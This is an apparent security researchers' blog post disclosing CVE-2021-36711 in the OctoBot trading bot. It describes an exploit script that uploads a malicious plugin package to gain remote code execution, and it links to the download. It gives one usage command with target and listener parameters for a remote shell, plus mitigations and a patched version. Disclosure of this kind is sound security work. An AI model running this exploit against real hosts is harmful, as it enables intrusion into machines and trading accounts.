[CVE-2021-36711] Sashimi Evil OctoBot Tentacle

Sashimi Evil OctoBot Tentacle is a python script that exploits a vulnerability that lies in the Tentacles upload functionality of the cryptocurrency trading bot OctoBot which is designed to be easy to use and customizable. Indeed, this open source trading bot has the particularity of offering to theirs users the possibility to upload their own trading algorithms.

Sashimi Evil OctoBot Tentacle takes advantage of this feature to upload a malicious crafted package that leads to an arbitrary code execution.

Affected versions

All OctoBot versions until the latest version (0.4.0b12) are vulnerable. However, this exploit will work from version 0.4.0b3 until version 0.4.1.

Proof of concept

(PoC Tested on Octobot 0.4.0b10)

Funny isn't it?

More in depth tutorial video by @CodeMaru:

Requirement

  • Python 3 (Must already have it if you are OctoBot user :D)
    • An OctoBot target host platform.

      As usual the 3 scripts presented are open source and available on GitHub at the following address:

      python3 sashimi.py --RHOST TARGET_IP --RPORT TARGET_PORT --LHOST YOUR_IP --LPORT YOUR_OPEN_PORT

      Be patient for around 3 min, the time to download, create and upload the malicious Tentacle package, and you should have a remote access to the machine. That’s it!

      Mitigation

      To protect against this attack, set a password in your OctoBot platform or add an .htpasswd.

      [Update] A new version, 0.4.4, that fix the vulnerability has been released.

      https://github.com/Drakkar-Software/OctoBot/issues/1966

      Note

      FOR EDUCATIONAL PURPOSE ONLY.

      Reference

      https://nvd.nist.gov/vuln/detail/CVE-2021-36711

      Download

      https://gitlab.com/0xSamy/Sashimi-Evil-OctoBot-Tentacle

        Thanks for reading this article! I hope you could learn something through our research! If you liked what you read, please share and follow us on twitter at @NeroTeamLabs

      Security researchers